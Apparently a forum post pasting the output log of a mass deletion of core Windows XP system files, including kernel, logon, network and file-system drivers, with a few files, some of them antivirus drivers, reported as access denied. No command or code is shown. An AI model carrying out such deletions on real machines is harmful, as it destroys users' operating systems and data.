      81. Deleted file - C:\WINDOWS\system32\dllcache\ntkrnlmp.exe
      82. Deleted file - C:\WINDOWS\system32\dllcache\ntkrnlpa.exe
      83. Deleted file - C:\WINDOWS\system32\dllcache\ntkrpamp.exe
      84. Deleted file - C:\WINDOWS\system32\dllcache\ntoskrnl.exe
      85. Deleted file - C:\WINDOWS\system32\dllcache\ntsd.exe
      86. Deleted file - C:\WINDOWS\system32\dllcache\ntvdm.exe
      87. Deleted file - C:\WINDOWS\system32\dllcache\nw16.exe
      88. Deleted file - C:\WINDOWS\system32\dllcache\nwscript.exe
      89. Deleted file - C:\WINDOWS\system32\dllcache\odbcad32.exe
      90. Deleted file - C:\WINDOWS\system32\dllcache\odbcconf.exe
      91. Deleted file - C:\WINDOWS\system32\dllcache\oemig50.exe
      92. Deleted file - C:\WINDOWS\system32\dllcache\oobebaln.exe
      93. Deleted file - C:\WINDOWS\system32\dllcache\opnfiles.exe
      94. Deleted file - C:\WINDOWS\system32\dllcache\osk.exe
      95. Deleted file - C:\WINDOWS\system32\dllcache\osuninst.exe
      96. Deleted file - C:\WINDOWS\system32\dllcache\packager.exe
      97. Deleted file - C:\WINDOWS\system32\dllcache\pathping.exe
      98. Deleted file - C:\WINDOWS\system32\dllcache\pentnt.exe
      99. Deleted file - C:\WINDOWS\system32\dllcache\perfmon.exe
      100. Deleted file - C:\WINDOWS\system32\dllcache\pinball.exe
      101. Deleted file - C:\WINDOWS\system32\dllcache\ping.exe
      102. Deleted file - C:\WINDOWS\system32\dllcache\ping6.exe
      103. Deleted file - C:\WINDOWS\system32\dllcache\pintlphr.exe
      104. Deleted file - C:\WINDOWS\system32\dllcache\powercfg.exe
      105. Deleted file - C:\WINDOWS\system32\dllcache\print.exe
      106. Deleted file - C:\WINDOWS\system32\dllcache\progman.exe
      107. Deleted file - C:\WINDOWS\system32\dllcache\proquota.exe
      108. Deleted file - C:\WINDOWS\system32\dllcache\proxycfg.exe
      109. Deleted file - C:\WINDOWS\system32\dllcache\qappsrv.exe
      110. Deleted file - C:\WINDOWS\system32\dllcache\qprocess.exe
      111. Deleted file - C:\WINDOWS\system32\dllcache\query.exe
      112. Deleted file - C:\WINDOWS\system32\dllcache\quser.exe
      113. Deleted file - C:\WINDOWS\system32\dllcache\qwinsta.exe
      114. Deleted file - C:\WINDOWS\system32\dllcache\rasautou.exe
      115. Deleted file - C:\WINDOWS\system32\dllcache\rasdial.exe
      116. Deleted file - C:\WINDOWS\system32\dllcache\rasphone.exe
      117. Deleted file - C:\WINDOWS\system32\dllcache\rcimlby.exe
      118. Deleted file - C:\WINDOWS\system32\dllcache\rcp.exe
      119. Deleted file - C:\WINDOWS\system32\dllcache\rdpclip.exe
      120. Deleted file - C:\WINDOWS\system32\dllcache\rdsaddin.exe
      121. Deleted file - C:\WINDOWS\system32\dllcache\rdshost.exe
      122. Deleted file - C:\WINDOWS\system32\dllcache\recover.exe
      123. Deleted file - C:\WINDOWS\system32\dllcache\redir.exe
      124. Deleted file - C:\WINDOWS\system32\dllcache\reg.exe
      125. Deleted file - C:\WINDOWS\system32\dllcache\regedit.exe
      126. Deleted file - C:\WINDOWS\system32\dllcache\regedt32.exe
      127. Deleted file - C:\WINDOWS\system32\dllcache\regini.exe
      128. Deleted file - C:\WINDOWS\system32\dllcache\register.exe
      129. Deleted file - C:\WINDOWS\system32\dllcache\regsvr32.exe
      130. Deleted file - C:\WINDOWS\system32\dllcache\regwiz.exe
      131. Deleted file - C:\WINDOWS\system32\dllcache\relog.exe
      132. Deleted file - C:\WINDOWS\system32\dllcache\replace.exe
      133. Deleted file - C:\WINDOWS\system32\dllcache\reset.exe
      134. Deleted file - C:\WINDOWS\system32\dllcache\rexec.exe
      135. Deleted file - C:\WINDOWS\system32\dllcache\route.exe
      136. Deleted file - C:\WINDOWS\system32\dllcache\routemon.exe
      137. Deleted file - C:\WINDOWS\system32\dllcache\rsh.exe
      138. Deleted file - C:\WINDOWS\system32\dllcache\rsm.exe
      139. Deleted file - C:\WINDOWS\system32\dllcache\rsmsink.exe
      140. Deleted file - C:\WINDOWS\system32\dllcache\rsmui.exe
      141. Deleted file - C:\WINDOWS\system32\dllcache\rsnotify.exe
      142. Deleted file - C:\WINDOWS\system32\dllcache\rsopprov.exe
      143. Deleted file - C:\WINDOWS\system32\dllcache\rstrui.exe
      144. Deleted file - C:\WINDOWS\system32\dllcache\rsvp.exe
      145. Deleted file - C:\WINDOWS\system32\dllcache\rtcshare.exe
      146. Deleted file - C:\WINDOWS\system32\dllcache\runas.exe
      147. Deleted file - C:\WINDOWS\system32\dllcache\rundll32.exe
      148. Deleted file - C:\WINDOWS\system32\dllcache\runonce.exe
      149. Deleted file - C:\WINDOWS\system32\dllcache\rvsezm.exe
      150. Deleted file - C:\WINDOWS\system32\dllcache\rwinsta.exe
      151. Deleted file - C:\WINDOWS\system32\dllcache\sapisvr.exe
      152. Deleted file - C:\WINDOWS\system32\dllcache\savedump.exe
      153. Deleted file - C:\WINDOWS\system32\dllcache\sc.exe
      154. Deleted file - C:\WINDOWS\system32\dllcache\scardsvr.exe
      155. Deleted file - C:\WINDOWS\system32\dllcache\scrcons.exe
      156. Deleted file - C:\WINDOWS\system32\dllcache\sctasks.exe
      157. Deleted file - C:\WINDOWS\system32\dllcache\sdbinst.exe
      158. Deleted file - C:\WINDOWS\system32\dllcache\secedit.exe
      159. Deleted file - C:\WINDOWS\system32\dllcache\services.exe
      160. Deleted file - C:\WINDOWS\system32\dllcache\sessmgr.exe
      161. Deleted file - C:\WINDOWS\system32\dllcache\sethc.exe
      162. Deleted file - C:\WINDOWS\system32\dllcache\setup.exe
      163. Deleted file - C:\WINDOWS\system32\dllcache\setup50.exe
      164. Deleted file - C:\WINDOWS\system32\dllcache\setupn.exe
      165. Deleted file - C:\WINDOWS\system32\dllcache\setup_wm.exe
      166. Deleted file - C:\WINDOWS\system32\dllcache\sfc.exe
      167. Deleted file - C:\WINDOWS\system32\dllcache\shadow.exe
      168. Deleted file - C:\WINDOWS\system32\dllcache\share.exe
      169. Deleted file - C:\WINDOWS\system32\dllcache\shmgrate.exe
      170. Deleted file - C:\WINDOWS\system32\dllcache\shrpubw.exe
      171. Deleted file - C:\WINDOWS\system32\dllcache\shtml.exe
      172. Deleted file - C:\WINDOWS\system32\dllcache\shutdown.exe
      173. Deleted file - C:\WINDOWS\system32\dllcache\shvlzm.exe
      174. Deleted file - C:\WINDOWS\system32\dllcache\sigverif.exe
      175. Deleted file - C:\WINDOWS\system32\dllcache\skeys.exe
      176. Deleted file - C:\WINDOWS\system32\dllcache\smbinst.exe
      177. Deleted file - C:\WINDOWS\system32\dllcache\smi2smir.exe
      178. Deleted file - C:\WINDOWS\system32\dllcache\smlogsvc.exe
      179. Deleted file - C:\WINDOWS\system32\dllcache\smss.exe
      180. Deleted file - C:\WINDOWS\system32\dllcache\sndrec32.exe
      181. Deleted file - C:\WINDOWS\system32\dllcache\sndvol32.exe
      182. Deleted file - C:\WINDOWS\system32\dllcache\snmp.exe
      183. Deleted file - C:\WINDOWS\system32\dllcache\snmptrap.exe
      184. Deleted file - C:\WINDOWS\system32\dllcache\sol.exe
      185. Deleted file - C:\WINDOWS\system32\dllcache\sort.exe
      186. Deleted file - C:\WINDOWS\system32\dllcache\spider.exe
      187. Deleted file - C:\WINDOWS\system32\dllcache\spiisupd.exe
      188. Deleted file - C:\WINDOWS\system32\dllcache\spnpinst.exe
      189. Deleted file - C:\WINDOWS\system32\dllcache\spoolsv.exe
      190. Deleted file - C:\WINDOWS\system32\dllcache\sprestrt.exe
      191. Deleted file - C:\WINDOWS\system32\dllcache\srdiag.exe
      192. Deleted file - C:\WINDOWS\system32\dllcache\stimon.exe
      193. Deleted file - C:\WINDOWS\system32\dllcache\subst.exe
      194. Deleted file - C:\WINDOWS\system32\dllcache\svchost.exe
      195. Deleted file - C:\WINDOWS\system32\dllcache\syncapp.exe
      196. Deleted file - C:\WINDOWS\system32\dllcache\sysedit.exe
      197. Deleted file - C:\WINDOWS\system32\dllcache\sysinfo.exe
      198. Deleted file - C:\WINDOWS\system32\dllcache\syskey.exe
      199. Deleted file - C:\WINDOWS\system32\dllcache\sysocmgr.exe
      200. Deleted file - C:\WINDOWS\system32\dllcache\systray.exe
      201. Deleted file - C:\WINDOWS\system32\dllcache\taskkill.exe
      202. Deleted file - C:\WINDOWS\system32\dllcache\tasklist.exe
      203. Deleted file - C:\WINDOWS\system32\dllcache\taskman.exe
      204. Deleted file - C:\WINDOWS\system32\dllcache\taskmgr.exe
      205. Deleted file - C:\WINDOWS\system32\dllcache\tcmsetup.exe
      206. Deleted file - C:\WINDOWS\system32\dllcache\tcpsvcs.exe
      207. Deleted file - C:\WINDOWS\system32\dllcache\tcptest.exe
      208. Deleted file - C:\WINDOWS\system32\dllcache\telnet.exe
      209. Deleted file - C:\WINDOWS\system32\dllcache\tftp.exe
      210. Deleted file - C:\WINDOWS\system32\dllcache\tintlphr.exe
      211. Deleted file - C:\WINDOWS\system32\dllcache\tintsetp.exe
      212. Deleted file - C:\WINDOWS\system32\dllcache\tlntadmn.exe
      213. Deleted file - C:\WINDOWS\system32\dllcache\tlntsess.exe
      214. Deleted file - C:\WINDOWS\system32\dllcache\tlntsvr.exe
      215. Deleted file - C:\WINDOWS\system32\dllcache\tourstrt.exe
      216. Deleted file - C:\WINDOWS\system32\dllcache\tourW.exe
      217. Deleted file - C:\WINDOWS\system32\dllcache\tracerpt.exe
      218. Deleted file - C:\WINDOWS\system32\dllcache\tracert.exe
      219. Deleted file - C:\WINDOWS\system32\dllcache\tracert6.exe
      220. Deleted file - C:\WINDOWS\system32\dllcache\tscon.exe
      221. Deleted file - C:\WINDOWS\system32\dllcache\tsdiscon.exe
      222. Deleted file - C:\WINDOWS\system32\dllcache\tskill.exe
      223. Deleted file - C:\WINDOWS\system32\dllcache\tsprof.exe
      224. Deleted file - C:\WINDOWS\system32\dllcache\tsshutdn.exe
      225. Deleted file - C:\WINDOWS\system32\dllcache\twunk_16.exe
      226. Deleted file - C:\WINDOWS\system32\dllcache\twunk_32.exe
      227. Deleted file - C:\WINDOWS\system32\dllcache\typeperf.exe
      228. Deleted file - C:\WINDOWS\system32\dllcache\unlodctr.exe
      229. Deleted file - C:\WINDOWS\system32\dllcache\unregmp2.exe
      230. Deleted file - C:\WINDOWS\system32\dllcache\unsecapp.exe
      231. Deleted file - C:\WINDOWS\system32\dllcache\uploadm.exe
      232. Deleted file - C:\WINDOWS\system32\dllcache\upnpcont.exe
      233. Deleted file - C:\WINDOWS\system32\dllcache\ups.exe
      234. Deleted file - C:\WINDOWS\system32\dllcache\user.exe
      235. Deleted file - C:\WINDOWS\system32\dllcache\userinit.exe
      236. Deleted file - C:\WINDOWS\system32\dllcache\utilman.exe
      237. Deleted file - C:\WINDOWS\system32\dllcache\verifier.exe
      238. Deleted file - C:\WINDOWS\system32\dllcache\vssadmin.exe
      239. Deleted file - C:\WINDOWS\system32\dllcache\vssvc.exe
      240. Deleted file - C:\WINDOWS\system32\dllcache\vwipxspx.exe
      241. Deleted file - C:\WINDOWS\system32\dllcache\w32tm.exe
      242. Deleted file - C:\WINDOWS\system32\dllcache\wab.exe
      243. Deleted file - C:\WINDOWS\system32\dllcache\wabmig.exe
      244. Deleted file - C:\WINDOWS\system32\dllcache\wb32.exe
      245. Deleted file - C:\WINDOWS\system32\dllcache\wbemtest.exe
      246. Deleted file - C:\WINDOWS\system32\dllcache\wextract.exe
      247. Deleted file - C:\WINDOWS\system32\dllcache\wiaacmgr.exe
      248. Deleted file - C:\WINDOWS\system32\dllcache\winchat.exe
      249. Deleted file - C:\WINDOWS\system32\dllcache\winhelp.exe
      250. Deleted file - C:\WINDOWS\system32\dllcache\winhlp32.exe
      251. Deleted file - C:\WINDOWS\system32\dllcache\winhstb.exe
      252. Deleted file - C:\WINDOWS\system32\dllcache\winlogon.exe
      253. Deleted file - C:\WINDOWS\system32\dllcache\winmgmt.exe
      254. Deleted file - C:\WINDOWS\system32\dllcache\winmine.exe
      255. Deleted file - C:\WINDOWS\system32\dllcache\winmsd.exe
      256. Deleted file - C:\WINDOWS\system32\dllcache\winspool.exe
      257. Deleted file - C:\WINDOWS\system32\dllcache\winver.exe
      258. Deleted file - C:\WINDOWS\system32\dllcache\wmiadap.exe
      259. Deleted file - C:\WINDOWS\system32\dllcache\wmiapsrv.exe
      260. Deleted file - C:\WINDOWS\system32\dllcache\wmic.exe
      261. Deleted file - C:\WINDOWS\system32\dllcache\wmiprvse.exe
      262. Deleted file - C:\WINDOWS\system32\dllcache\wmplayer.exe
      263. Deleted file - C:\WINDOWS\system32\dllcache\wordpad.exe
      264. Deleted file - C:\WINDOWS\system32\dllcache\wowdeb.exe
      265. Deleted file - C:\WINDOWS\system32\dllcache\wowexec.exe
      266. Deleted file - C:\WINDOWS\system32\dllcache\wpabaln.exe
      267. Deleted file - C:\WINDOWS\system32\dllcache\wpnpinst.exe
      268. Deleted file - C:\WINDOWS\system32\dllcache\write.exe
      269. Deleted file - C:\WINDOWS\system32\dllcache\wscntfy.exe
      270. Deleted file - C:\WINDOWS\system32\dllcache\wscript.exe
      271. Deleted file - C:\WINDOWS\system32\dllcache\wuauclt.exe
      272. Deleted file - C:\WINDOWS\system32\dllcache\wuauclt1.exe
      273. Deleted file - C:\WINDOWS\system32\dllcache\wupdmgr.exe
      274. Deleted file - C:\WINDOWS\system32\dllcache\xcopy.exe
      275. Deleted file - C:\WINDOWS\system32\dllcache\zclientm.exe
      276. Deleted file - C:\WINDOWS\system32\IME\CINTLGNT\CINTSETP.EXE
      277. Deleted file - C:\WINDOWS\system32\IME\PINTLGNT\IMSCINST.EXE
      278. Deleted file - C:\WINDOWS\system32\IME\PINTLGNT\PINTLPHR.EXE
      279. Deleted file - C:\WINDOWS\system32\IME\TINTLGNT\TINTLPHR.EXE
      280. Deleted file - C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
      281. C:\WINDOWS\system32\Macromed\Flash\FlashUtil10a.exe
      282. Access is denied.
      283. Deleted file - C:\WINDOWS\system32\Macromed\Flash\genuinst.exe
      284. Deleted file - C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
      285. Deleted file - C:\WINDOWS\system32\npp\nppagent.exe
      286. Deleted file - C:\WINDOWS\system32\oobe\msoobe.exe
      287. Deleted file - C:\WINDOWS\system32\oobe\oobebaln.exe
      288. Deleted file - C:\WINDOWS\system32\Restore\rstrui.exe
      289. Deleted file - C:\WINDOWS\system32\Restore\srdiag.exe
      290. Deleted file - C:\WINDOWS\system32\usmt\migload.exe
      291. Deleted file - C:\WINDOWS\system32\usmt\migwiz.exe
      292. Deleted file - C:\WINDOWS\system32\usmt\migwiza.exe
      293. Deleted file - C:\WINDOWS\system32\wbem\mofcomp.exe
      294. Deleted file - C:\WINDOWS\system32\wbem\scrcons.exe
      295. Deleted file - C:\WINDOWS\system32\wbem\unsecapp.exe
      296. Deleted file - C:\WINDOWS\system32\wbem\wbemtest.exe
      297. Deleted file - C:\WINDOWS\system32\wbem\winmgmt.exe
      298. Deleted file - C:\WINDOWS\system32\wbem\wmiadap.exe
      299. Deleted file - C:\WINDOWS\system32\wbem\wmiapsrv.exe
      300. Deleted file - C:\WINDOWS\system32\wbem\wmic.exe
      301. Deleted file - C:\WINDOWS\system32\wbem\wmiprvse.exe
      302. [/COLOR][/SIZE][/FONT]
      303. [FONT=Times New Roman][size=14][COLOR=red]
      عرض الكل

      كود المصدر

      1. [/COLOR][/SIZE][/FONT]
      2. [FONT=Times New Roman][size=14][COLOR=red]Deleted file - C:\WINDOWS\system32\dllcache\dmboot.sys
      3. Deleted file - C:\WINDOWS\system32\dllcache\dmio.sys
      4. Deleted file - C:\WINDOWS\system32\dllcache\dmload.sys
      5. Deleted file - C:\WINDOWS\system32\dllcache\dmusic.sys
      6. Deleted file - C:\WINDOWS\system32\dllcache\drmk.sys
      7. Deleted file - C:\WINDOWS\system32\dllcache\drmkaud.sys
      8. Deleted file - C:\WINDOWS\system32\dllcache\dxapi.sys
      9. Deleted file - C:\WINDOWS\system32\dllcache\dxgthk.sys
      10. Deleted file - C:\WINDOWS\system32\dllcache\et4000.sys
      11. Deleted file - C:\WINDOWS\system32\dllcache\fastfat.sys
      12. Deleted file - C:\WINDOWS\system32\dllcache\fips.sys
      13. Deleted file - C:\WINDOWS\system32\dllcache\fltmgr.sys
      14. Deleted file - C:\WINDOWS\system32\dllcache\fs_rec.sys
      15. Deleted file - C:\WINDOWS\system32\dllcache\himem.sys
      16. Deleted file - C:\WINDOWS\system32\dllcache\ip6fw.sys
      17. Deleted file - C:\WINDOWS\system32\dllcache\ipfltdrv.sys
      18. Deleted file - C:\WINDOWS\system32\dllcache\ipinip.sys
      19. Deleted file - C:\WINDOWS\system32\dllcache\ipnat.sys
      20. Deleted file - C:\WINDOWS\system32\dllcache\ipsec.sys
      21. Deleted file - C:\WINDOWS\system32\dllcache\irenum.sys
      22. Deleted file - C:\WINDOWS\system32\dllcache\key01.sys
      23. Deleted file - C:\WINDOWS\system32\dllcache\keyboard.sys
      24. Deleted file - C:\WINDOWS\system32\dllcache\kmixer.sys
      25. Deleted file - C:\WINDOWS\system32\dllcache\ks.sys
      26. Deleted file - C:\WINDOWS\system32\dllcache\ksecdd.sys
      27. Deleted file - C:\WINDOWS\system32\dllcache\mcd.sys
      28. Deleted file - C:\WINDOWS\system32\dllcache\mga.sys
      29. Deleted file - C:\WINDOWS\system32\dllcache\mnmdd.sys
      30. Deleted file - C:\WINDOWS\system32\dllcache\mountmgr.sys
      31. Deleted file - C:\WINDOWS\system32\dllcache\mqac.sys
      32. Deleted file - C:\WINDOWS\system32\dllcache\mrxdav.sys
      33. Deleted file - C:\WINDOWS\system32\dllcache\mrxsmb.sys
      34. Deleted file - C:\WINDOWS\system32\dllcache\msfs.sys
      35. Deleted file - C:\WINDOWS\system32\dllcache\msgpc.sys
      36. Deleted file - C:\WINDOWS\system32\dllcache\mskssrv.sys
      37. Deleted file - C:\WINDOWS\system32\dllcache\mspclock.sys
      38. Deleted file - C:\WINDOWS\system32\dllcache\mspqm.sys
      39. Deleted file - C:\WINDOWS\system32\dllcache\mup.sys
      40. Deleted file - C:\WINDOWS\system32\dllcache\ndis.sys
      41. Deleted file - C:\WINDOWS\system32\dllcache\ndistapi.sys
      42. Deleted file - C:\WINDOWS\system32\dllcache\ndiswan.sys
      43. Deleted file - C:\WINDOWS\system32\dllcache\ndproxy.sys
      44. Deleted file - C:\WINDOWS\system32\dllcache\netbios.sys
      45. Deleted file - C:\WINDOWS\system32\dllcache\netbt.sys
      46. Deleted file - C:\WINDOWS\system32\dllcache\nmnt.sys
      47. Deleted file - C:\WINDOWS\system32\dllcache\npfs.sys
      48. Deleted file - C:\WINDOWS\system32\dllcache\ntdos.sys
      49. Deleted file - C:\WINDOWS\system32\dllcache\ntdos404.sys
      50. Deleted file - C:\WINDOWS\system32\dllcache\ntdos411.sys
      51. Deleted file - C:\WINDOWS\system32\dllcache\ntdos412.sys
      52. Deleted file - C:\WINDOWS\system32\dllcache\ntdos804.sys
      53. Deleted file - C:\WINDOWS\system32\dllcache\ntfs.sys
      54. Deleted file - C:\WINDOWS\system32\dllcache\ntio.sys
      55. Deleted file - C:\WINDOWS\system32\dllcache\ntio404.sys
      56. Deleted file - C:\WINDOWS\system32\dllcache\ntio411.sys
      57. Deleted file - C:\WINDOWS\system32\dllcache\ntio412.sys
      58. Deleted file - C:\WINDOWS\system32\dllcache\ntio804.sys
      59. Deleted file - C:\WINDOWS\system32\dllcache\null.sys
      60. Deleted file - C:\WINDOWS\system32\dllcache\nwlnkflt.sys
      61. Deleted file - C:\WINDOWS\system32\dllcache\nwlnkfwd.sys
      62. Deleted file - C:\WINDOWS\system32\dllcache\nwlnkipx.sys
      63. Deleted file - C:\WINDOWS\system32\dllcache\nwlnknb.sys
      64. Deleted file - C:\WINDOWS\system32\dllcache\nwlnkspx.sys
      65. Deleted file - C:\WINDOWS\system32\dllcache\nwrdr.sys
      66. Deleted file - C:\WINDOWS\system32\dllcache\partmgr.sys
      67. Deleted file - C:\WINDOWS\system32\dllcache\parvdm.sys
      68. Deleted file - C:\WINDOWS\system32\dllcache\portcls.sys
      69. Deleted file - C:\WINDOWS\system32\dllcache\psched.sys
      70. Deleted file - C:\WINDOWS\system32\dllcache\ptilink.sys
      71. Deleted file - C:\WINDOWS\system32\dllcache\ramdisk.sys
      72. Deleted file - C:\WINDOWS\system32\dllcache\rasacd.sys
      73. Deleted file - C:\WINDOWS\system32\dllcache\rasl2tp.sys
      74. Deleted file - C:\WINDOWS\system32\dllcache\raspppoe.sys
      75. Deleted file - C:\WINDOWS\system32\dllcache\raspptp.sys
      76. Deleted file - C:\WINDOWS\system32\dllcache\raspti.sys
      77. Deleted file - C:\WINDOWS\system32\dllcache\rawwan.sys
      78. Deleted file - C:\WINDOWS\system32\dllcache\rdbss.sys
      79. Deleted file - C:\WINDOWS\system32\dllcache\rdpcdd.sys
      80. Deleted file - C:\WINDOWS\system32\dllcache\rdpwd.sys
      81. Deleted file - C:\WINDOWS\system32\dllcache\rmcast.sys
      82. Deleted file - C:\WINDOWS\system32\dllcache\rndismp.sys
      83. Deleted file - C:\WINDOWS\system32\dllcache\rootmdm.sys
      84. Deleted file - C:\WINDOWS\system32\dllcache\smclib.sys
      85. Deleted file - C:\WINDOWS\system32\dllcache\splitter.sys
      86. Deleted file - C:\WINDOWS\system32\dllcache\sr.sys
      87. Deleted file - C:\WINDOWS\system32\dllcache\srv.sys
      88. Deleted file - C:\WINDOWS\system32\dllcache\stream.sys
      89. Deleted file - C:\WINDOWS\system32\dllcache\swmidi.sys
      90. Deleted file - C:\WINDOWS\system32\dllcache\sysaudio.sys
      91. Deleted file - C:\WINDOWS\system32\dllcache\tape.sys
      92. Deleted file - C:\WINDOWS\system32\dllcache\tcpip.sys
      93. Deleted file - C:\WINDOWS\system32\dllcache\tcpip6.sys
      94. Deleted file - C:\WINDOWS\system32\dllcache\tdasync.sys
      95. Deleted file - C:\WINDOWS\system32\dllcache\tdi.sys
      96. Deleted file - C:\WINDOWS\system32\dllcache\tdipx.sys
      97. Deleted file - C:\WINDOWS\system32\dllcache\tdpipe.sys
      98. Deleted file - C:\WINDOWS\system32\dllcache\tdspx.sys
      99. Deleted file - C:\WINDOWS\system32\dllcache\tdtcp.sys
      100. Deleted file - C:\WINDOWS\system32\dllcache\udfs.sys
      101. Deleted file - C:\WINDOWS\system32\dllcache\update.sys
      102. Deleted file - C:\WINDOWS\system32\dllcache\usb8023.sys
      103. Deleted file - C:\WINDOWS\system32\dllcache\usbstor.sys
      104. Deleted file - C:\WINDOWS\system32\dllcache\vga.sys
      105. Deleted file - C:\WINDOWS\system32\dllcache\videoprt.sys
      106. Deleted file - C:\WINDOWS\system32\dllcache\volsnap.sys
      107. Deleted file - C:\WINDOWS\system32\dllcache\wanarp.sys
      108. Deleted file - C:\WINDOWS\system32\dllcache\watchdog.sys
      109. Deleted file - C:\WINDOWS\system32\dllcache\wdmaud.sys
      110. Deleted file - C:\WINDOWS\system32\dllcache\weitekp9.sys
      111. Deleted file - C:\WINDOWS\system32\dllcache\win32k.sys
      112. Deleted file - C:\WINDOWS\system32\dllcache\wmilib.sys
      113. Deleted file - C:\WINDOWS\system32\dllcache\ws2ifsl.sys
      114. Deleted file - C:\WINDOWS\system32\drivers\acpi.sys
      115. Deleted file - C:\WINDOWS\system32\drivers\acpiec.sys
      116. Deleted file - C:\WINDOWS\system32\drivers\aec.sys
      117. Deleted file - C:\WINDOWS\system32\drivers\afd.sys
      118. Deleted file - C:\WINDOWS\system32\drivers\amdk6.sys
      119. Deleted file - C:\WINDOWS\system32\drivers\amdk7.sys
      120. Deleted file - C:\WINDOWS\system32\drivers\arp1394.sys
      121. Deleted file - C:\WINDOWS\system32\drivers\asyncmac.sys
      122. Deleted file - C:\WINDOWS\system32\drivers\atapi.sys
      123. Deleted file - C:\WINDOWS\system32\drivers\atmarpc.sys
      124. Deleted file - C:\WINDOWS\system32\drivers\atmepvc.sys
      125. Deleted file - C:\WINDOWS\system32\drivers\atmlane.sys
      126. Deleted file - C:\WINDOWS\system32\drivers\atmuni.sys
      127. Deleted file - C:\WINDOWS\system32\drivers\audstub.sys
      128. Deleted file - C:\WINDOWS\system32\drivers\beep.sys
      129. Deleted file - C:\WINDOWS\system32\drivers\bridge.sys
      130. Deleted file - C:\WINDOWS\system32\drivers\bthport.sys
      131. Deleted file - C:\WINDOWS\system32\drivers\cbidf2k.sys
      132. Deleted file - C:\WINDOWS\system32\drivers\cdaudio.sys
      133. Deleted file - C:\WINDOWS\system32\drivers\cdfs.sys
      134. Deleted file - C:\WINDOWS\system32\drivers\cdrom.sys
      135. Deleted file - C:\WINDOWS\system32\drivers\cinemst2.sys
      136. Deleted file - C:\WINDOWS\system32\drivers\classpnp.sys
      137. Deleted file - C:\WINDOWS\system32\drivers\cpqdap01.sys
      138. Deleted file - C:\WINDOWS\system32\drivers\crusoe.sys
      139. Deleted file - C:\WINDOWS\system32\drivers\DeepFrz.sys
      140. Deleted file - C:\WINDOWS\system32\drivers\disk.sys
      141. Deleted file - C:\WINDOWS\system32\drivers\diskdump.sys
      142. Deleted file - C:\WINDOWS\system32\drivers\dmboot.sys
      143. Deleted file - C:\WINDOWS\system32\drivers\dmio.sys
      144. Deleted file - C:\WINDOWS\system32\drivers\dmload.sys
      145. Deleted file - C:\WINDOWS\system32\drivers\DMusic.sys
      146. Deleted file - C:\WINDOWS\system32\drivers\drmk.sys
      147. Deleted file - C:\WINDOWS\system32\drivers\drmkaud.sys
      148. Deleted file - C:\WINDOWS\system32\drivers\dxapi.sys
      149. C:\WINDOWS\system32\drivers\dxg.sys
      150. Access is denied.
      151. Deleted file - C:\WINDOWS\system32\drivers\dxgthk.sys
      152. Deleted file - C:\WINDOWS\system32\drivers\fastfat.sys
      153. Deleted file - C:\WINDOWS\system32\drivers\fdc.sys
      154. Deleted file - C:\WINDOWS\system32\drivers\fetnd5.sys
      155. Deleted file - C:\WINDOWS\system32\drivers\fips.sys
      156. Deleted file - C:\WINDOWS\system32\drivers\flpydisk.sys
      157. Deleted file - C:\WINDOWS\system32\drivers\fltMgr.sys
      158. Deleted file - C:\WINDOWS\system32\drivers\fsvga.sys
      159. Deleted file - C:\WINDOWS\system32\drivers\fs_rec.sys
      160. Deleted file - C:\WINDOWS\system32\drivers\ftdisk.sys
      161. Deleted file - C:\WINDOWS\system32\drivers\GAGP30KX.SYS
      162. Deleted file - C:\WINDOWS\system32\drivers\hidclass.sys
      163. Deleted file - C:\WINDOWS\system32\drivers\hidparse.sys
      164. Deleted file - C:\WINDOWS\system32\drivers\http.sys
      165. Deleted file - C:\WINDOWS\system32\drivers\i8042prt.sys
      166. Deleted file - C:\WINDOWS\system32\drivers\imapi.sys
      167. Deleted file - C:\WINDOWS\system32\drivers\intelppm.sys
      168. Deleted file - C:\WINDOWS\system32\drivers\ip6fw.sys
      169. Deleted file - C:\WINDOWS\system32\drivers\ipfltdrv.sys
      170. Deleted file - C:\WINDOWS\system32\drivers\ipinip.sys
      171. Deleted file - C:\WINDOWS\system32\drivers\ipnat.sys
      172. Deleted file - C:\WINDOWS\system32\drivers\ipsec.sys
      173. Deleted file - C:\WINDOWS\system32\drivers\irenum.sys
      174. Deleted file - C:\WINDOWS\system32\drivers\isapnp.sys
      175. Deleted file - C:\WINDOWS\system32\drivers\kbdclass.sys
      176. C:\WINDOWS\system32\drivers\kl1.sys
      177. Access is denied.
      178. C:\WINDOWS\system32\drivers\klbg.sys
      179. Access is denied.
      180. C:\WINDOWS\system32\drivers\klfltdev.sys
      181. Access is denied.
      182. C:\WINDOWS\system32\drivers\klif.sys
      183. Access is denied.
      184. Deleted file - C:\WINDOWS\system32\drivers\kmixer.sys
      185. Deleted file - C:\WINDOWS\system32\drivers\ks.sys
      186. Deleted file - C:\WINDOWS\system32\drivers\ksecdd.sys
      187. Deleted file - C:\WINDOWS\system32\drivers\mcd.sys
      188. Deleted file - C:\WINDOWS\system32\drivers\mf.sys
      189. Deleted file - C:\WINDOWS\system32\drivers\mnmdd.sys
      190. Deleted file - C:\WINDOWS\system32\drivers\modem.sys
      191. Deleted file - C:\WINDOWS\system32\drivers\mouclass.sys
      192. Deleted file - C:\WINDOWS\system32\drivers\mountmgr.sys
      193. Deleted file - C:\WINDOWS\system32\drivers\mqac.sys
      194. Deleted file - C:\WINDOWS\system32\drivers\mrxdav.sys
      195. Deleted file - C:\WINDOWS\system32\drivers\mrxsmb.sys
      196. Deleted file - C:\WINDOWS\system32\drivers\msfs.sys
      197. Deleted file - C:\WINDOWS\system32\drivers\msgpc.sys
      198. Deleted file - C:\WINDOWS\system32\drivers\MSKSSRV.sys
      199. Deleted file - C:\WINDOWS\system32\drivers\MSPCLOCK.sys
      200. Deleted file - C:\WINDOWS\system32\drivers\MSPQM.sys
      201. Deleted file - C:\WINDOWS\system32\drivers\mssmbios.sys
      202. Deleted file - C:\WINDOWS\system32\drivers\mup.sys
      203. Deleted file - C:\WINDOWS\system32\drivers\ndis.sys
      204. Deleted file - C:\WINDOWS\system32\drivers\ndistapi.sys
      205. Deleted file - C:\WINDOWS\system32\drivers\ndisuio.sys
      206. Deleted file - C:\WINDOWS\system32\drivers\ndiswan.sys
      207. Deleted file - C:\WINDOWS\system32\drivers\ndproxy.sys
      208. Deleted file - C:\WINDOWS\system32\drivers\netbios.sys
      209. Deleted file - C:\WINDOWS\system32\drivers\netbt.sys
      210. Deleted file - C:\WINDOWS\system32\drivers\nic1394.sys
      211. Deleted file - C:\WINDOWS\system32\drivers\nikedrv.sys
